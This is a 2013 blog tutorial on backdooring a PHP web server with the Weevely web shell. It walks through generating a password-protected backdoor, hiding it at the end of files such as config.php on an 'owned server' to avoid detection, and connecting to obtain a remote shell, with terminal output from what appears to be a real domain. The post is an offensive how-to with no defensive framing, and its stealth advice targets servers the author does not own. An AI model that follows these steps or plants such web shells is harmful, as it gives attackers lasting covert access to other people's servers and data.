Monday, 2 September 2013

How To Backdoor A WebServer Using Weevely PHP Backdoor

backdoor a server using weevely backdoor

In this tutorial, i will show you how to use weevely PHP backdoor to backdoor an apache webserver. You can use this method to backdoor any webserver running PHP on it.

Note:  
Weevely PHP backdoor is very stealthy. It will reside in the page that we will backdoor, but it will be hard to detect. Moreover password protection feature make it more secure from backdooring prospective.

First you need to install weevely on your machine.

Download weevely

Now if you are on Windows OS then follow my tutorial "How to install weevely web-backdoor tool on Windows". For linux users, its simple . Just download it and run it with python.

Now lets start backdooring procedure.

1- Open terminal or cmd and run weevely to verify that it working.

CMD: weevely.py
Terminal: ./weevely.py

Note: 
I will show this tutorial accoding to linux environment. Windows users must replace ./weevely.py with weevely.py to make it working in windows.

Output:
      ________                     __
     |  |  |  |----.----.-.--.----'  |--.--.
     |  |  |  | -__| -__| |  | -__|  |  |  |
     |________|____|____|___/|____|__|___  | v1.1
                                     |_____|
              Stealth tiny web shell

[+] Start ssh-like terminal session
    weevely <url> <password>

[+] Run command directly from command line
    weevely <url> <password> [ "<command> .." | :<module> .. ] 

[+] Restore a saved session file
    weevely session [ <file> ]

[+] Generate PHP backdoor
    weevely generate <password> [ <path> ] ..

[+] Show credits
    weevely credits
   
[+] Show available module and backdoor generators
    weevely help

2- Now run weevely generate command to generate a PHP backdoor.

./weevely.py generate exploiter_zee ~/Desktop/backdoor.php

Output:

[generate.php] Backdoor file '/home/exploiter/Desktop/backdoor.php' created with password 'exploiter_zee'

3- Now generated backdoor is available on our provided path. Open it with some text editor and copy all code of this backdoor.php. Now go back to your owned server and open some file that you want to backdoor. For example, i want to backdoor config.php, config.inc.php, connection.php etc. Now open each file and paste this code at the end or start of that PHP file.(I would recommend pasting at the end of file, because it will make your injected backdoor a little bit anonymous).

4- Now server is backdoored. Lets test it with our weevely tool. Open termial or cmd and connect to those backdoored files using following weevely command.

./weevely http://site.com/config.php exploiter_zee

Output:
      ________                     __
     |  |  |  |----.----.-.--.----'  |--.--.
     |  |  |  | -__| -__| |  | -__|  |  |  |
     |________|____|____|___/|____|__|___  | v1.1
                                     |_____|
              Stealth tiny web shell

[+] Browse filesystem, execute commands or list available modules with ':help'
[+] Current session: 'sessions/telekomxchange.net/config.session'

[shell.php] [!] Error: No response
hostan@:/home1/hostan/public_html $

Brief Explanation:
In above command we are trying to connect to config.php file that we just a moment ago backdoored and exploiter_zee is password of our backdoor.